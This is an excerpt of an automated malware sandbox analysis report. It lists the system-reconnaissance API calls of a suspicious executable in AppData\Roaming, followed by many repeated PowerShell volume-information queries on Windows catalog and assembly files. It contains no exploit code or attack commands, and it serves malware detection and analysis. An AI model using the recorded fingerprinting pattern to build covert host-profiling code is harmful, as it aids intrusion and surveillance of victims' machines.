                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,5_2_03625430
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
